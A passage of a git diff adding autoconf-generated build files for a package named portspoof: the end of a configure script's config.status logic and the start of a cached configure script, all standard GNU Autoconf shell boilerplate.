in + [\\/$]*) false;; + *) test -f "$srcdir/$ac_f" && ac_f="$srcdir/$ac_f";; + esac || + as_fn_error "cannot find input file: \`$ac_f'" "$LINENO" 5;; + esac + case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac + as_fn_append ac_file_inputs " '$ac_f'" + done + + # Let's still pretend it is `configure' which instantiates (i.e., don't + # use $as_me), people would be surprised to read: + # /* config.h. Generated by config.status. */ + configure_input='Generated from '` + $as_echo "$*" | sed 's|^[^:]*/||;s|:[^:]*/|, |g' + `' by configure.' + if test x"$ac_file" != x-; then + configure_input="$ac_file. $configure_input" + { $as_echo "$as_me:${as_lineno-$LINENO}: creating $ac_file" >&5 +$as_echo "$as_me: creating $ac_file" >&6;} + fi + # Neutralize special characters interpreted by sed in replacement strings. + case $configure_input in #( + *\&* | *\|* | *\\* ) + ac_sed_conf_input=`$as_echo "$configure_input" | + sed 's/[\\\\&|]/\\\\&/g'`;; #( + *) ac_sed_conf_input=$configure_input;; + esac + + case $ac_tag in + *:-:* | *:-) cat >"$tmp/stdin" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 ;; + esac + ;; + esac + + ac_dir=`$as_dirname -- "$ac_file" || +$as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$ac_file" : 'X\(//\)[^/]' \| \ + X"$ac_file" : 'X\(//\)$' \| \ + X"$ac_file" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$ac_file" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + as_dir="$ac_dir"; as_fn_mkdir_p + ac_builddir=. + +case "$ac_dir" in +.) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; +*) + ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` + # A ".." for each directory in $ac_dir_suffix. + ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` + case $ac_top_builddir_sub in + "") ac_top_builddir_sub=. ac_top_build_prefix= ;; + *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; + esac ;; +esac +ac_abs_top_builddir=$ac_pwd +ac_abs_builddir=$ac_pwd$ac_dir_suffix +# for backward compatibility: +ac_top_builddir=$ac_top_build_prefix + +case $srcdir in + .) # We are building in place. + ac_srcdir=. + ac_top_srcdir=$ac_top_builddir_sub + ac_abs_top_srcdir=$ac_pwd ;; + [\\/]* | ?:[\\/]* ) # Absolute name. + ac_srcdir=$srcdir$ac_dir_suffix; + ac_top_srcdir=$srcdir + ac_abs_top_srcdir=$srcdir ;; + *) # Relative name. + ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix + ac_top_srcdir=$ac_top_build_prefix$srcdir + ac_abs_top_srcdir=$ac_pwd/$srcdir ;; +esac +ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix + + + case $ac_mode in + :F) + # + # CONFIG_FILE + # + + case $INSTALL in + [\\/$]* | ?:[\\/]* ) ac_INSTALL=$INSTALL ;; + *) ac_INSTALL=$ac_top_build_prefix$INSTALL ;; + esac + ac_MKDIR_P=$MKDIR_P + case $MKDIR_P in + [\\/$]* | ?:[\\/]* ) ;; + */*) ac_MKDIR_P=$ac_top_build_prefix$MKDIR_P ;; + esac +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# If the template does not know about datarootdir, expand it. +# FIXME: This hack should be removed a few years after 2.60. +ac_datarootdir_hack=; ac_datarootdir_seen= +ac_sed_dataroot=' +/datarootdir/ { + p + q +} +/@datadir@/p +/@docdir@/p +/@infodir@/p +/@localedir@/p +/@mandir@/p' +case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in +*datarootdir*) ac_datarootdir_seen=yes;; +*@datadir@*|*@docdir@*|*@infodir@*|*@localedir@*|*@mandir@*) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&5 +$as_echo "$as_me: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&2;} +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 + ac_datarootdir_hack=' + s&@datadir@&$datadir&g + s&@docdir@&$docdir&g + s&@infodir@&$infodir&g + s&@localedir@&$localedir&g + s&@mandir@&$mandir&g + s&\\\${datarootdir}&$datarootdir&g' ;; +esac +_ACEOF + +# Neutralize VPATH when `$srcdir' = `.'. +# Shell code in configure.ac might set extrasub. +# FIXME: do we really want to maintain this feature? +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +ac_sed_extra="$ac_vpsub +$extrasub +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +:t +/@[a-zA-Z_][a-zA-Z_0-9]*@/!b +s|@configure_input@|$ac_sed_conf_input|;t t +s&@top_builddir@&$ac_top_builddir_sub&;t t +s&@top_build_prefix@&$ac_top_build_prefix&;t t +s&@srcdir@&$ac_srcdir&;t t +s&@abs_srcdir@&$ac_abs_srcdir&;t t +s&@top_srcdir@&$ac_top_srcdir&;t t +s&@abs_top_srcdir@&$ac_abs_top_srcdir&;t t +s&@builddir@&$ac_builddir&;t t +s&@abs_builddir@&$ac_abs_builddir&;t t +s&@abs_top_builddir@&$ac_abs_top_builddir&;t t +s&@INSTALL@&$ac_INSTALL&;t t +s&@MKDIR_P@&$ac_MKDIR_P&;t t +$ac_datarootdir_hack +" +eval sed \"\$ac_sed_extra\" "$ac_file_inputs" | $AWK -f "$tmp/subs.awk" >$tmp/out \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + +test -z "$ac_datarootdir_hack$ac_datarootdir_seen" && + { ac_out=`sed -n '/\${datarootdir}/p' "$tmp/out"`; test -n "$ac_out"; } && + { ac_out=`sed -n '/^[ ]*datarootdir[ ]*:*=/p' "$tmp/out"`; test -z "$ac_out"; } && + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file contains a reference to the variable \`datarootdir' +which seems to be undefined. Please make sure it is defined." >&5 +$as_echo "$as_me: WARNING: $ac_file contains a reference to the variable \`datarootdir' +which seems to be undefined. Please make sure it is defined." >&2;} + + rm -f "$tmp/stdin" + case $ac_file in + -) cat "$tmp/out" && rm -f "$tmp/out";; + *) rm -f "$ac_file" && mv "$tmp/out" "$ac_file";; + esac \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + ;; + :H) + # + # CONFIG_HEADER + # + if test x"$ac_file" != x-; then + { + $as_echo "/* $configure_input */" \ + && eval '$AWK -f "$tmp/defines.awk"' "$ac_file_inputs" + } >"$tmp/config.h" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + if diff "$ac_file" "$tmp/config.h" >/dev/null 2>&1; then + { $as_echo "$as_me:${as_lineno-$LINENO}: $ac_file is unchanged" >&5 +$as_echo "$as_me: $ac_file is unchanged" >&6;} + else + rm -f "$ac_file" + mv "$tmp/config.h" "$ac_file" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + fi + else + $as_echo "/* $configure_input */" \ + && eval '$AWK -f "$tmp/defines.awk"' "$ac_file_inputs" \ + || as_fn_error "could not create -" "$LINENO" 5 + fi +# Compute "$ac_file"'s index in $config_headers. +_am_arg="$ac_file" +_am_stamp_count=1 +for _am_header in $config_headers :; do + case $_am_header in + $_am_arg | $_am_arg:* ) + break ;; + * ) + _am_stamp_count=`expr $_am_stamp_count + 1` ;; + esac +done +echo "timestamp for $_am_arg" >`$as_dirname -- "$_am_arg" || +$as_expr X"$_am_arg" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$_am_arg" : 'X\(//\)[^/]' \| \ + X"$_am_arg" : 'X\(//\)$' \| \ + X"$_am_arg" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$_am_arg" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'`/stamp-h$_am_stamp_count + ;; + + :C) { $as_echo "$as_me:${as_lineno-$LINENO}: executing $ac_file commands" >&5 +$as_echo "$as_me: executing $ac_file commands" >&6;} + ;; + esac + + + case $ac_file$ac_mode in + "depfiles":C) test x"$AMDEP_TRUE" != x"" || { + # Autoconf 2.62 quotes --file arguments for eval, but not when files + # are listed without --file. Let's play safe and only enable the eval + # if we detect the quoting. + case $CONFIG_FILES in + *\'*) eval set x "$CONFIG_FILES" ;; + *) set x $CONFIG_FILES ;; + esac + shift + for mf + do + # Strip MF so we end up with the name of the file. + mf=`echo "$mf" | sed -e 's/:.*$//'` + # Check whether this is an Automake generated Makefile or not. + # We used to match only the files named `Makefile.in', but + # some people rename them; so instead we look at the file content. + # Grep'ing the first line is not enough: some people post-process + # each Makefile.in and add a new line on top of each file to say so. + # Grep'ing the whole file is not good either: AIX grep has a line + # limit of 2048, but all sed's we know have understand at least 4000. + if sed -n 's,^#.*generated by automake.*,X,p' "$mf" | grep X >/dev/null 2>&1; then + dirpart=`$as_dirname -- "$mf" || +$as_expr X"$mf" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$mf" : 'X\(//\)[^/]' \| \ + X"$mf" : 'X\(//\)$' \| \ + X"$mf" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$mf" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + else + continue + fi + # Extract the definition of DEPDIR, am__include, and am__quote + # from the Makefile without running `make'. + DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` + test -z "$DEPDIR" && continue + am__include=`sed -n 's/^am__include = //p' < "$mf"` + test -z "am__include" && continue + am__quote=`sed -n 's/^am__quote = //p' < "$mf"` + # When using ansi2knr, U may be empty or an underscore; expand it + U=`sed -n 's/^U = //p' < "$mf"` + # Find all dependency output files, they are included files with + # $(DEPDIR) in their names. We invoke sed twice because it is the + # simplest approach to changing $(DEPDIR) to its actual value in the + # expansion. + for file in `sed -n " + s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ + sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do + # Make sure the directory exists. + test -f "$dirpart/$file" && continue + fdir=`$as_dirname -- "$file" || +$as_expr X"$file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$file" : 'X\(//\)[^/]' \| \ + X"$file" : 'X\(//\)$' \| \ + X"$file" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$file" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + as_dir=$dirpart/$fdir; as_fn_mkdir_p + # echo "creating $dirpart/$file" + echo '# dummy' > "$dirpart/$file" + done + done +} + ;; + + esac +done # for ac_tag + + +as_fn_exit 0 +_ACEOF +ac_clean_files=$ac_clean_files_save + +test $ac_write_fail = 0 || + as_fn_error "write failure creating $CONFIG_STATUS" "$LINENO" 5 + + +# configure is writing to config.log, and then calls config.status. +# config.status does its own redirection, appending to config.log. +# Unfortunately, on DOS this fails, as config.log is still kept open +# by configure, so config.status won't be able to write to it; its +# output is simply discarded. So we exec the FD to /dev/null, +# effectively closing config.log, so it can be properly (re)opened and +# appended to by config.status. When coming back to configure, we +# need to make the FD available again. +if test "$no_create" != yes; then + ac_cs_success=: + ac_config_status_args= + test "$silent" = yes && + ac_config_status_args="$ac_config_status_args --quiet" + exec 5>/dev/null + $SHELL $CONFIG_STATUS $ac_config_status_args || ac_cs_success=false + exec 5>>config.log + # Use ||, not &&, to avoid exiting from the if with $? = 1, which + # would make configure fail if this is the last instruction. + $ac_cs_success || as_fn_exit $? +fi +if test -n "$ac_unrecognized_opts" && test "$enable_option_checking" != no; then + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: unrecognized options: $ac_unrecognized_opts" >&5 +$as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2;} +fi + diff --git a/autom4te.cache/output.1 b/autom4te.cache/output.1 new file mode 100644 index 0000000..3f56202 --- /dev/null +++ b/autom4te.cache/output.1 @@ -0,0 +1,6412 @@ +@%:@! /bin/sh +@%:@ Guess values for system-dependent variables and create Makefiles. +@%:@ Generated by GNU Autoconf 2.65 for portspoof 1.0. +@%:@ +@%:@ Report bugs to . +@%:@ +@%:@ +@%:@ Copyright (C) 1992, 1993, 1994, 1995, 1996, 1998, 1999, 2000, 2001, +@%:@ 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, +@%:@ Inc. +@%:@ +@%:@ +@%:@ This configure script is free software; the Free Software Foundation +@%:@ gives unlimited permission to copy, distribute and modify it. +## -------------------- ## +## M4sh Initialization. ## +## -------------------- ## + +# Be more Bourne compatible +DUALCASE=1; export DUALCASE # for MKS sh +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : + emulate sh + NULLCMD=: + # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which + # is contrary to our usage. Disable this feature. + alias -g '${1+"$@"}'='"$@"' + setopt NO_GLOB_SUBST +else + case `(set -o) 2>/dev/null` in @%:@( + *posix*) : + set -o posix ;; @%:@( + *) : + ;; +esac +fi + + +as_nl=' +' +export as_nl +# Printing a long string crashes Solaris 7 /usr/bin/printf. +as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo +# Prefer a ksh shell builtin over an external printf program on Solaris, +# but without wasting forks for bash or zsh. +if test -z "$BASH_VERSION$ZSH_VERSION" \ + && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='print -r --' + as_echo_n='print -rn --' +elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='printf %s\n' + as_echo_n='printf %s' +else + if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then + as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' + as_echo_n='/usr/ucb/echo -n' + else + as_echo_body='eval expr "X$1" : "X\\(.*\\)"' + as_echo_n_body='eval + arg=$1; + case $arg in @%:@( + *"$as_nl"*) + expr "X$arg" : "X\\(.*\\)$as_nl"; + arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; + esac; + expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" + ' + export as_echo_n_body + as_echo_n='sh -c $as_echo_n_body as_echo' + fi + export as_echo_body + as_echo='sh -c $as_echo_body as_echo' +fi + +# The user is always right. +if test "${PATH_SEPARATOR+set}" != set; then + PATH_SEPARATOR=: + (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { + (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || + PATH_SEPARATOR=';' + } +fi + + +# IFS +# We need space, tab and new line, in precisely that order. Quoting is +# there to prevent editors from complaining about space-tab. +# (If _AS_PATH_WALK were called with IFS unset, it would disable word +# splitting by setting IFS to empty value.) +IFS=" "" $as_nl" + +# Find who we are. Look in the path if we contain no directory separator. +case $0 in @%:@(( + *[\\/]* ) as_myself=$0 ;; + *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break + done +IFS=$as_save_IFS + + ;; +esac +# We did not find ourselves, most probably we were run as `sh COMMAND' +# in which case we are not to be found in the path. +if test "x$as_myself" = x; then + as_myself=$0 +fi +if test ! -f "$as_myself"; then + $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 + exit 1 +fi + +# Unset variables that we do not need and which cause bugs (e.g. in +# pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" +# suppresses any "Segmentation fault" message there. '((' could +# trigger a bug in pdksh 5.2.14. +for as_var in BASH_ENV ENV MAIL MAILPATH +do eval test x\${$as_var+set} = xset \ + && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : +done +PS1='$ ' +PS2='> ' +PS4='+ ' + +# NLS nuisances. +LC_ALL=C +export LC_ALL +LANGUAGE=C +export LANGUAGE + +# CDPATH. +(unset CDPATH) >/dev/null 2>&1 && unset CDPATH + +if test "x$CONFIG_SHELL" = x; then + as_bourne_compatible="if test -n \"\${ZSH_VERSION+set}\" && (emulate sh) >/dev/null 2>&1; then : + emulate sh + NULLCMD=: + # Pre-4.2 versions of Zsh do word splitting on \${1+\"\$@\"}, which + # is contrary to our usage. Disable this feature. + alias -g '\${1+\"\$@\"}'='\"\$@\"' + setopt NO_GLOB_SUBST +else + case \`(set -o) 2>/dev/null\` in @%:@( + *posix*) : + set -o posix ;; @%:@( + *) : + ;; +esac +fi +" + as_required="as_fn_return () { (exit \$1); } +as_fn_success () { as_fn_return 0; } +as_fn_failure () { as_fn_return 1; } +as_fn_ret_success () { return 0; } +as_fn_ret_failure () { return 1; } + +exitcode=0 +as_fn_success || { exitcode=1; echo as_fn_success failed.; } +as_fn_failure && { exitcode=1; echo as_fn_failure succeeded.; } +as_fn_ret_success || { exitcode=1; echo as_fn_ret_success failed.; } +as_fn_ret_failure && { exitcode=1; echo as_fn_ret_failure succeeded.; } +if ( set x; as_fn_ret_success y && test x = \"\$1\" ); then : + +else + exitcode=1; echo positional parameters were not saved. +fi +test x\$exitcode = x0 || exit 1" + as_suggested=" as_lineno_1=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_1a=\$LINENO + as_lineno_2=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_2a=\$LINENO + eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" && + test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1 +test \$(( 1 + 1 )) = 2 || exit 1" + if (eval "$as_required") 2>/dev/null; then : + as_have_required=yes +else + as_have_required=no +fi + if test x$as_have_required = xyes && (eval "$as_suggested") 2>/dev/null; then : + +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +as_found=false +for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + as_found=: + case $as_dir in @%:@( + /*) + for as_base in sh bash ksh sh5; do + # Try only shells that exist, to save several forks. + as_shell=$as_dir/$as_base + if { test -f "$as_shell" || test -f "$as_shell.exe"; } && + { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$as_shell"; } 2>/dev/null; then : + CONFIG_SHELL=$as_shell as_have_required=yes + if { $as_echo "$as_bourne_compatible""$as_suggested" | as_run=a "$as_shell"; } 2>/dev/null; then : + break 2 +fi +fi + done;; + esac + as_found=false +done +$as_found || { if { test -f "$SHELL" || test -f "$SHELL.exe"; } && + { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$SHELL"; } 2>/dev/null; then : + CONFIG_SHELL=$SHELL as_have_required=yes +fi; } +IFS=$as_save_IFS + + + if test "x$CONFIG_SHELL" != x; then : + # We cannot yet assume a decent shell, so we have to provide a + # neutralization value for shells without unset; and this also + # works around shells that cannot unset nonexistent variables. + BASH_ENV=/dev/null + ENV=/dev/null + (unset BASH_ENV) >/dev/null 2>&1 && unset BASH_ENV ENV + export CONFIG_SHELL + exec "$CONFIG_SHELL" "$as_myself" ${1+"$@"} +fi + + if test x$as_have_required = xno; then : + $as_echo "$0: This script requires a shell more modern than all" + $as_echo "$0: the shells that I found on your system." + if test x${ZSH_VERSION+set} = xset ; then + $as_echo "$0: In particular, zsh $ZSH_VERSION has bugs and should" + $as_echo "$0: be upgraded to zsh 4.3.4 or later." + else + $as_echo "$0: Please tell bug-autoconf@gnu.org and +$0: piotr@<:@at@:>@duszynski.eu about your system, including any +$0: error possibly output before this message. Then install +$0: a modern shell, or manually run the script under such a +$0: shell if you do have one." + fi + exit 1 +fi +fi +fi +SHELL=${CONFIG_SHELL-/bin/sh} +export SHELL +# Unset more variables known to interfere with behavior of common tools. +CLICOLOR_FORCE= GREP_OPTIONS= +unset CLICOLOR_FORCE GREP_OPTIONS + +## --------------------- ## +## M4sh Shell Functions. ## +## --------------------- ## +@%:@ as_fn_unset VAR +@%:@ --------------- +@%:@ Portably unset VAR. +as_fn_unset () +{ + { eval $1=; unset $1;} +} +as_unset=as_fn_unset + +@%:@ as_fn_set_status STATUS +@%:@ ----------------------- +@%:@ Set @S|@? to STATUS, without forking. +as_fn_set_status () +{ + return $1 +} @%:@ as_fn_set_status + +@%:@ as_fn_exit STATUS +@%:@ ----------------- +@%:@ Exit the shell with STATUS, even in a "trap 0" or "set -e" context. +as_fn_exit () +{ + set +e + as_fn_set_status $1 + exit $1 +} @%:@ as_fn_exit + +@%:@ as_fn_mkdir_p +@%:@ ------------- +@%:@ Create "@S|@as_dir" as a directory, including parents if necessary. +as_fn_mkdir_p () +{ + + case $as_dir in #( + -*) as_dir=./$as_dir;; + esac + test -d "$as_dir" || eval $as_mkdir_p || { + as_dirs= + while :; do + case $as_dir in #( + *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( + *) as_qdir=$as_dir;; + esac + as_dirs="'$as_qdir' $as_dirs" + as_dir=`$as_dirname -- "$as_dir" || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + test -d "$as_dir" && break + done + test -z "$as_dirs" || eval "mkdir $as_dirs" + } || test -d "$as_dir" || as_fn_error "cannot create directory $as_dir" + + +} @%:@ as_fn_mkdir_p +@%:@ as_fn_append VAR VALUE +@%:@ ---------------------- +@%:@ Append the text in VALUE to the end of the definition contained in VAR. Take +@%:@ advantage of any shell optimizations that allow amortized linear growth over +@%:@ repeated appends, instead of the typical quadratic growth present in naive +@%:@ implementations. +if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : + eval 'as_fn_append () + { + eval $1+=\$2 + }' +else + as_fn_append () + { + eval $1=\$$1\$2 + } +fi # as_fn_append + +@%:@ as_fn_arith ARG... +@%:@ ------------------ +@%:@ Perform arithmetic evaluation on the ARGs, and store the result in the +@%:@ global @S|@as_val. Take advantage of shells that can avoid forks. The arguments +@%:@ must be portable across @S|@(()) and expr. +if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : + eval 'as_fn_arith () + { + as_val=$(( $* )) + }' +else + as_fn_arith () + { + as_val=`expr "$@" || test $? -eq 1` + } +fi # as_fn_arith + + +@%:@ as_fn_error ERROR [LINENO LOG_FD] +@%:@ --------------------------------- +@%:@ Output "`basename @S|@0`: error: ERROR" to stderr. If LINENO and LOG_FD are +@%:@ provided, also output the error to LOG_FD, referencing LINENO. Then exit the +@%:@ script with status @S|@?, using 1 if that was 0. +as_fn_error () +{ + as_status=$?; test $as_status -eq 0 && as_status=1 + if test "$3"; then + as_lineno=${as_lineno-"$2"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + $as_echo "$as_me:${as_lineno-$LINENO}: error: $1" >&$3 + fi + $as_echo "$as_me: error: $1" >&2 + as_fn_exit $as_status +} @%:@ as_fn_error + +if expr a : '\(a\)' >/dev/null 2>&1 && + test "X`expr 00001 : '.*\(...\)'`" = X001; then + as_expr=expr +else + as_expr=false +fi + +if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then + as_basename=basename +else + as_basename=false +fi + +if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then + as_dirname=dirname +else + as_dirname=false +fi + +as_me=`$as_basename -- "$0" || +$as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ + X"$0" : 'X\(//\)$' \| \ + X"$0" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X/"$0" | + sed '/^.*\/\([^/][^/]*\)\/*$/{ + s//\1/ + q + } + /^X\/\(\/\/\)$/{ + s//\1/ + q + } + /^X\/\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits + + + as_lineno_1=$LINENO as_lineno_1a=$LINENO + as_lineno_2=$LINENO as_lineno_2a=$LINENO + eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" && + test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || { + # Blame Lee E. McMahon (1931-1989) for sed's syntax. :-) + sed -n ' + p + /[$]LINENO/= + ' <$as_myself | + sed ' + s/[$]LINENO.*/&-/ + t lineno + b + :lineno + N + :loop + s/[$]LINENO\([^'$as_cr_alnum'_].*\n\)\(.*\)/\2\1\2/ + t loop + s/-\n.*// + ' >$as_me.lineno && + chmod +x "$as_me.lineno" || + { $as_echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2; as_fn_exit 1; } + + # Don't try to exec as it changes $[0], causing all sort of problems + # (the dirname of $[0] is not the place where we might find the + # original and so on. Autoconf is especially sensitive to this). + . "./$as_me.lineno" + # Exit status is that of the last command. + exit +} + +ECHO_C= ECHO_N= ECHO_T= +case `echo -n x` in @%:@((((( +-n*) + case `echo 'xy\c'` in + *c*) ECHO_T=' ';; # ECHO_T is single tab character. + xy) ECHO_C='\c';; + *) echo `echo ksh88 bug on AIX 6.1` > /dev/null + ECHO_T=' ';; + esac;; +*) + ECHO_N='-n';; +esac + +rm -f conf$$ conf$$.exe conf$$.file +if test -d conf$$.dir; then + rm -f conf$$.dir/conf$$.file +else + rm -f conf$$.dir + mkdir conf$$.dir 2>/dev/null +fi +if (echo >conf$$.file) 2>/dev/null; then + if ln -s conf$$.file conf$$ 2>/dev/null; then + as_ln_s='ln -s' + # ... but there are two gotchas: + # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. + # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. + # In both cases, we have to default to `cp -p'. + ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || + as_ln_s='cp -p' + elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln + else + as_ln_s='cp -p' + fi +else + as_ln_s='cp -p' +fi +rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file +rmdir conf$$.dir 2>/dev/null + +if mkdir -p . 2>/dev/null; then + as_mkdir_p='mkdir -p "$as_dir"' +else + test -d ./-p && rmdir ./-p + as_mkdir_p=false +fi + +if test -x / >/dev/null 2>&1; then + as_test_x='test -x' +else + if ls -dL / >/dev/null 2>&1; then + as_ls_L_option=L + else + as_ls_L_option= + fi + as_test_x=' + eval sh -c '\'' + if test -d "$1"; then + test -d "$1/."; + else + case $1 in @%:@( + -*)set "./$1";; + esac; + case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in @%:@(( + ???[sx]*):;;*)false;;esac;fi + '\'' sh + ' +fi +as_executable_p=$as_test_x + +# Sed expression to map a string onto a valid CPP name. +as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" + +# Sed expression to map a string onto a valid variable name. +as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" + + +test -n "$DJDIR" || exec 7<&0 &1 + +# Name of the host. +# hostname on some systems (SVR3.2, Linux) returns a bogus exit status, +# so uname gets run too. +ac_hostname=`(hostname || uname -n) 2>/dev/null | sed 1q` + +# +# Initializations. +# +ac_default_prefix=/usr/local +ac_clean_files= +ac_config_libobj_dir=. +LIB@&t@OBJS= +cross_compiling=no +subdirs= +MFLAGS= +MAKEFLAGS= + +# Identity of this package. +PACKAGE_NAME='portspoof' +PACKAGE_TARNAME='portspoof' +PACKAGE_VERSION='1.0' +PACKAGE_STRING='portspoof 1.0' +PACKAGE_BUGREPORT='piotratduszynski.eu' +PACKAGE_URL='' + +ac_unique_file="src/Portspoof.cpp" +# Factoring default headers for most tests. +ac_includes_default="\ 